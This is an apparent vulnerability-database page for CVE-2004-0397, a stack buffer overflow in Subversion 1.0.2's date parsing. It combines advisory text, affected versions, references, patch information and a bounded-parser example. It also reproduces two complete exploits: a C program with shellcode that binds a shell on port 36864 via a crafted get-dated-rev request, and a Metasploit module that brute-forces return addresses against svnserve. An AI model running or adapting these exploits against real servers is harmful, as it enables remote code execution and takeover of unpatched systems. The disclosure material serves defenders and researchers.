CVE-2004-0397
CVSS7.5
Published: 2004-07-07 00:00:00
Revised: 2016-10-17 22:45:00

[Original text] Stack-based buffer overflow during the apr_time_t data conversion in Subversion 1.0.2 and earlier allows remote attackers to execute arbitrary code via a (1) DAV2 REPORT query or (2) get-dated-rev svn-protocol command.


[CNNVD] Subversion Date Parsing Function Buffer Overflow Vulnerability (CNNVD-200407-009)

        
        Subversion is a version control system.
        Subversion does not properly check request data submitted by users; a remote attacker can exploit this vulnerability to carry out a buffer overflow attack against the system.
        When Subversion converts a string to an apr_time_t value, it uses sscanf() to decode old-format date strings. Because the arguments are not sufficiently checked, submitting an overly long date string can trigger a buffer overflow. A remote attacker can reach this code through a DAV2 REPORT query or the get-dated-rev svn-protocol command; carefully constructed data may allow arbitrary instructions to be executed with the privileges of the process.
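The parsing defect described above (and again in the OSVDB and Bugtraq entries further down) is an sscanf() "%s" conversion into a fixed-size buffer. The following is an added example, not Subversion's code: a constructed model of a legacy timestamp parser in the shape the exploit requests on this page use, written the way the defect is avoided, with field widths bounded to the 4-byte buffers and a full-consumption check so an overlong weekday or month token is rejected rather than copied.

```c
#include <stdio.h>
#include <string.h>

/* Constructed format for "<wday> <mday> <month> <year> hh:mm:ss.usec
 * (day N, dst N, gmt_off N)". The unbounded form "%s %d %s %d ..." writes
 * a token of any length into a 4-byte buffer; "%3s" caps each string
 * field at 3 chars plus NUL, and "%n" records how much input was read. */
#define LEGACY_DATE_FMT \
    "%3s %d %3s %d %d:%d:%d.%d (day %d, dst %d, gmt_off %d)%n"

struct legacy_date {
    char wday[4];   /* 3-letter weekday, NUL-terminated */
    char month[4];  /* 3-letter month, NUL-terminated   */
    int mday, year, hour, min, sec, usec, yday, isdst, gmtoff;
};

/* Returns 1 and fills *out if data is a well-formed legacy timestamp:
 * all eleven conversions succeeded and only whitespace follows them. */
int legacy_date_parse(const char *data, struct legacy_date *out)
{
    int consumed = 0;
    int n = sscanf(data, LEGACY_DATE_FMT,
                   out->wday, &out->mday, out->month, &out->year,
                   &out->hour, &out->min, &out->sec, &out->usec,
                   &out->yday, &out->isdst, &out->gmtoff, &consumed);
    if (n != 11)
        return 0;
    for (; data[consumed] != '\0'; consumed++)
        if (data[consumed] != ' ' && data[consumed] != '\n')
            return 0;   /* trailing garbage after the parsed fields */
    return 1;
}

/* Accept/reject wrapper for callers that do not need the fields. */
int legacy_date_is_valid(const char *data)
{
    struct legacy_date d;
    return legacy_date_parse(data, &d);
}

int main(void)
{
    /* Constructed samples: a valid timestamp, then an overlong weekday. */
    const char *ok  = "Tue 3 Oct 2000 01:01:01.001000 (day 277, dst 1, gmt_off -18000)";
    const char *bad = "aaaaaaaaaaaaaaaaaaaa 3 Oct 2000 01:01:01.001000 (day 277, dst 1, gmt_off -18000)";
    printf("valid:    %d\n", legacy_date_is_valid(ok));   /* 1 */
    printf("overlong: %d\n", legacy_date_is_valid(bad));  /* 0 */
    return 0;
}
```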
        

- CVSS (base score)

CVSS score: 7.5 [HIGH]
Confidentiality impact: [--]
Integrity impact: [--]
Availability impact: [--]
Attack complexity: [--]
Attack vector: [--]
Authentication: [--]

- CPE (affected platforms and products)

cpe:/a:subversion:subversion:1.0
cpe:/a:subversion:subversion:1.0.2
cpe:/a:subversion:subversion:1.0.1

- OVAL (technical details for detection)

No related OVAL definitions found

- Official database links

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-0397
(official data source) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2004-0397
(official data source) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200407-009
(official data source) CNNVD

- Other links and resources

http://lists.grok.org.uk/pipermail/full-disclosure/2004-May/021737.html
(UNKNOWN)  FULLDISC  20040519 Advisory 08/2004: Subversion remote vulnerability
http://marc.info/?l=bugtraq&m=108498676517697&w=2
(UNKNOWN)  BUGTRAQ  20040519 Advisory 08/2004: Subversion remote vulnerability
http://security.e-matters.de/advisories/082004.html
(UNKNOWN)  MISC  http://security.e-matters.de/advisories/082004.html
http://subversion.tigris.org/svn-sscanf-advisory.txt
(UNKNOWN)  CONFIRM  http://subversion.tigris.org/svn-sscanf-advisory.txt
http://www.gentoo.org/security/en/glsa/glsa-200405-14.xml
(UNKNOWN)  GENTOO  GLSA-200405-14
http://www.linuxsecurity.com/advisories/fedora_advisory-4373.html
(VENDOR_ADVISORY)  FEDORA  FEDORA-2004-128
http://www.securityfocus.com/archive/1/363814
(VENDOR_ADVISORY)  BUGTRAQ  20040519 [OpenPKG-SA-2004.023] OpenPKG Security Advisory (subversion)
http://www.securityfocus.com/bid/10386
(VENDOR_ADVISORY)  BID  10386
http://xforce.iss.net/xforce/xfdb/16191
(VENDOR_ADVISORY)  XF  subversion-date-parsing-command-execution(16191)
https://bugzilla.fedora.us/show_bug.cgi?id=1748
(UNKNOWN)  FEDORA  FLSA:1748

- Vulnerability information

Subversion Date Parsing Function Buffer Overflow Vulnerability
High risk  Boundary condition error
2004-07-07 00:00:00 2005-10-20 00:00:00
Remote

- Advisories and patches

        Vendor patch:
        Subversion
        ----------
        The vendor has released an upgrade to fix this security issue; download it from the vendor's home page:
        Subversion Upgrade 1.0.3
        
        http://subversion.tigris.org/project_packages.html

- Vulnerability information (304)

Subversion 1.0.2 svn_time_from_cstring() Remote Exploit (EDBID:304)
linux remote
2004-06-25 Verified
3690 Gyan Chawdhary
N/A
/* subversion-1.0.2 exploit by Gyan Chawdhary ...
 * exploits a stack overflow in the svn_time_from_cstring() function. We build
 * a date format which is valid but at the same time exits after the sscanf
 * function, or else it branches into another function which segfaults at the
 * apr_pool_t *pool. We overwrite our eip with a pointer to the main *data
 * buffer stored in the heap where our shell code is stored in the main request
 * itself. This is because the local stack space for svn_time_from_cstring is
 * small. Will bind a shell on 36864 port. Modify it for your own usage.
 *
 * boring exploit for a boring vulnerability
 * Gyan
 */

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>

#include <sys/socket.h>
#include <netinet/in.h>
#include <arpa/inet.h>   /* inet_addr(), htons() */
#include <sys/types.h>

#define BUF_SIZE ( 1024 * 2 )
#define TRUE 1
#define FALSE 0
#define PORT 3690 /* Default svnserve Port */
#define IP "127.0.0.1"
#define CMD "/bin/uname -a ; id ;\r\n"

struct targets {
    char *os;
    unsigned int *eip;
    unsigned int *shell_nop;
};

/*struct targets TARGETS[] =
{
{ "Redhat 8.0 - (Psyche)",
*/
/* Return-address bytes spliced into the date string of request3. */
char offset1[] = "\x78\x32\x06\x08"; // 0x8063278 + 88 + 12;
char offset2[] = "\xdc\x32\x06\x08"; // 0x80632dc

int sockfd;

/* svn:// protocol greeting (length-prefixed URL), anonymous auth, the
 * get-dated-rev request carrying the oversized date string, and a spare
 * check-path request that is not sent. */
char request1[] = "( 2 ( edit-pipeline ) %d:%s )\n";

char request2[] = "( ANONYMOUS ( 0: ) )\n";

char request3[] = "( get-dated-rev ( 314:aaaaaaaa%saaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa%saaaaaaaa%saaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa 4 a tttt 16:24:23.111 (day 277, dst 1, gmt_off -18000) ) )\n";

char request4[] = "( check-path ( 0: ( 0 ) ) )\n";


/* p_types */
void xp_connect(char *);
char *build_request(char *);
void talk(char *, char *);


char shellcode[] =
"\xeb\x72\x5e\x29\xc0\x89\x46\x10\x40\x89\xc3\x89\x46\x0c"
"\x40\x89\x46\x08\x8d\x4e\x08\xb0\x66\xcd\x80\x43\xc6\x46"
"\x10\x10\x66\x89\x5e\x14\x88\x46\x08\x29\xc0\x89\xc2\x89"
"\x46\x18\xb0\x90\x66\x89\x46\x16\x8d\x4e\x14\x89\x4e\x0c"
"\x8d\x4e\x08\xb0\x66\xcd\x80\x89\x5e\x0c\x43\x43\xb0\x66"
"\xcd\x80\x89\x56\x0c\x89\x56\x10\xb0\x66\x43\xcd\x80\x86"
"\xc3\xb0\x3f\x29\xc9\xcd\x80\xb0\x3f\x41\xcd\x80\xb0\x3f"
"\x41\xcd\x80\x88\x56\x07\x89\x76\x0c\x87\xf3\x8d\x4b\x0c"
"\xb0\x0b\xcd\x80\xe8\x89\xff\xff\xff/bin/sh";


/* Connects the global sockfd to IP:PORT and reads the server greeting.
 * Note: the ip argument is unused; the IP macro is used instead. */
void xp_connect(char *ip)
{
    // int sockfd;
    struct sockaddr_in s;
    char buffer[1024];
    char temp[1024];
    int tmp;

    s.sin_family = AF_INET;
    s.sin_port = htons(PORT);
    s.sin_addr.s_addr = inet_addr(IP);

    if ((sockfd = socket(AF_INET, SOCK_STREAM, 0)) < 0)
    {
        printf("Cannot create socket\n");
        exit(-1);
    }

    if ((connect(sockfd, (struct sockaddr *)&s, sizeof(struct sockaddr))) < 0)
    {
        printf("Cannot connect()\n");
        exit(-1);
    }
    memset(temp, '\0', sizeof(temp));
    tmp = recv(sockfd, temp, 1024, 0);
}

/* Performs the protocol exchange: greeting, anonymous auth, then the
 * malformed get-dated-rev request built from the shellcode. */
void talk(char *ip, char *repo)
{
    char buffer[1024], request[1024], tmp[512];
    static char string[] = "svn://%s/%s";
    int size;
    char *str;

    sprintf(buffer, string, ip, repo);
    size = strlen(buffer);
    sprintf(request, request1, size, buffer);

    xp_connect(ip);

    if (send(sockfd, request, strlen(request), 0) < 0)
    {
        printf("send() failed\n");
        exit(-1);
    }
    recv(sockfd, tmp, 512, 0);

    if (send(sockfd, request2, strlen(request2), 0) < 0)
    {
        printf("send() failed\n");
        exit(-1);
    }
    recv(sockfd, tmp, 512, 0);

    str = build_request(shellcode);

    if (write(sockfd, str, strlen(str)) < 0)
    {
        printf("write() failed\n");
        exit(-1);
    }

    close(sockfd);
    //connect_target();
}


/* Fills request3's three %s slots with offset1, offset2 and the shellcode. */
char *build_request(char *sc)
{
    char *buffer, *ptr;
    buffer = (char *)malloc(1024);
    ptr = buffer;
    sprintf(ptr, request3, offset1, offset2, sc);

    return buffer;
}


int main(void)
{
    talk(IP, "cool");
    return 0;
}

// milw0rm.com [2004-06-25]

- Vulnerability information (16284)

Subversion Date Svnserve (EDBID:16284)
unix dos
2010-08-07 Verified
0 metasploit
N/A
##
# $Id: svnserve_date.rb 9971 2010-08-07 06:59:16Z jduck $
##

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##

require 'msf/core'
require 'msf/core/exploit/http/client'

class Metasploit3 < Msf::Exploit::Remote
	Rank = AverageRanking

	include Msf::Exploit::Brute
	include Msf::Exploit::Remote::Tcp

	def initialize(info = {})
		super(update_info(info,
			'Name'           => 'Subversion Date Svnserve',
			'Description'    => %q{
					This is an exploit for the Subversion date parsing overflow.  This
				exploit is for the svnserve daemon (svn:// protocol) and will not work
				for Subversion over webdav (http[s]://).  This exploit should never
				crash the daemon, and should be safe to do multi-hits.

				**WARNING** This exploit seems to (not very often, I've only seen
				it during testing) corrupt the subversion database, so be careful!
			},
			'Author'         => 'spoonm',
			'Version'        => '$Revision: 9971 $',
			'References'     =>
				[
					['CVE', '2004-0397'],
					['OSVDB', '6301'],
					['BID',	'10386'],
					['URL',   'http://lists.netsys.com/pipermail/full-disclosure/2004-May/021737.html'],
					['MIL',   '68'],
				],
			'Payload'        =>
				{
					'Space'    => 500,
					'BadChars' => "\x00\x09\x0a\x0b\x0c\x0d\x20",
					'MinNops'  => 16,
				},
			'SaveRegisters'  => [ 'esp' ],
			'Arch'           => 'x86',
			'Platform'       => [ 'linux', 'bsd' ],
			'Targets'        =>
				[
					[
						'Linux Bruteforce',
						{
							'Platform'   => 'linux',
							'Bruteforce' =>
								{
									'Start' => { 'Ret' => 0xbffffe13 },
									'Stop'  => { 'Ret' => 0xbfff0000 },
									'Step'  => 0
								}
						},
					],
					[
						'FreeBSD Bruteforce',
						{
							'Platform'   => 'bsd',
							'Bruteforce' =>
								{
									'Start' => { 'Ret' => 0xbfbffe13 },
									'Stop'  => { 'Ret' => 0xbfbf0000 },
									'Step'  => 0
								}
						},
					],

				],
			'DisclosureDate' => 'May 19 2004'))

		register_options(
			[
				Opt::RPORT(3690),
				OptString.new('URL', [ true, "SVN URL (ie svn://host/repos)", "svn://host/svn/repos" ])
			], self.class)

		register_advanced_options(
			[
				# 62 on spoonm's, 88 on HD's
				OptInt.new('RetLength', [ false, "Length of rets after payload", 100 ]),
				OptBool.new('IgnoreErrors', [ false, "Ignore errors", false ])
			], self.class)
	end

	def check
	end

	def brute_exploit(addresses)
		connect

		print_status("Trying #{"%.8x" % addresses['Ret']}...")

		buffer = ([addresses['Ret']].pack('V') * (datastore['RetLength'] / 4).to_i) + payload.encoded

		[
			"( 2 ( edit-pipeline ) " + lengther(datastore['URL']) + " ) ",
			"( ANONYMOUS ( 0; ) )",
			"( get-dated-rev ( " + lengther(buffer + " 3 Oct 2000 01:01:01.001 (day 277, dst 1, gmt_off)") + " ) ) "
		].each_with_index { |buf, index|
			trash = sock.get_once

			print_line("Received: #{trash}") if debugging?

			if (sock.put(buf) || 0) == 0 and index < 3
				print_error("Error transmitting buffer.")
				raise ExploitError, "Failed to transmit data" if !datastore['IgnoreErrors']
			end

			if index == 3 and trash.length > 0
				print_error("Received data when we shouldn't have")
				raise ExploitError, "Received data when it wasn't expected" if !datastore['IgnoreErrors']
			end
		}

		handler
		disconnect
	end

	def lengther(buf)
		"#{buf.length}:" + buf
	end

end
		

- Vulnerability information (F82288)

Subversion Date Overflow (PacketStormID:F82288)
2009-10-28 00:00:00
spoonm  
exploit,web,overflow,protocol
CVE-2004-0397

This is a Metasploit exploit for the Subversion date parsing overflow. This exploit is for the svnserve daemon (svn:// protocol) and will not work for Subversion over webdav (http[s]://). This exploit should never crash the daemon, and should be safe to do multi-hits.


- Vulnerability information

6301
Subversion (SVN) apr_time_t data Conversion Remote Overflow
Remote / Network Access Input Manipulation
Loss of Integrity
Exploit Public, Exploit Commercial

- Vulnerability description

A remote overflow exists in Subversion. Subversion fails to check the boundary when calling sscanf() to decode old-style date strings. By sending a specially crafted request via a DAV2 REPORT query or get-dated-rev svn-protocol command, a remote attacker can cause a buffer overflow and execute arbitrary code, resulting in a loss of integrity.

- Timeline

2004-05-19 Unknown
Unknown Unknown

- Solution

Upgrade to version 1.0.3 or higher, as it has been reported to fix this vulnerability. An upgrade is required as there are no known workarounds.

- References

- Vulnerability author

- Vulnerability information

Subversion Date Parsing Function Buffer Overflow Vulnerability
Boundary Condition Error 10386
Yes No
2004-05-19 12:00:00 2007-10-17 03:07:00
This issue was discovered by Stefan Esser <s.esser@ematters.de>.

- Affected program versions

Subversion Subversion 1.0.2
Subversion Subversion 1.0.1
+ Conectiva Linux 10.0
Subversion Subversion 1.0
Gentoo Linux 1.4
Subversion Subversion 1.0.3

- Unaffected program versions

Subversion Subversion 1.0.3

- Vulnerability discussion

Subversion is prone to a buffer-overflow vulnerability that resides in one of its data-parsing functions. Specifically, Subversion calls an 'sscanf()' function when converting data strings to different formats. As a result, the software copies user-supplied data into an unspecified buffer without proper boundary checks.

Subversion 1.0.2 and prior versions are prone to this issue.

- Exploitation

The following exploits are available:

- Solution

Subversion 1.0.3 has been released to address this issue. Please see the references for more information.


Subversion Subversion 1.0

Subversion Subversion 1.0.1

Subversion Subversion 1.0.2

- References

 

 

About the SCAP Chinese Community

The SCAP Chinese Community is the first open Chinese-language community in China devoted to SCAP. For more information, see [About this site].

Copyright notice

CVE/CWE/OVAL are registered trademarks of the MITRE Corporation; their official data sources are maintained on MITRE's corresponding websites.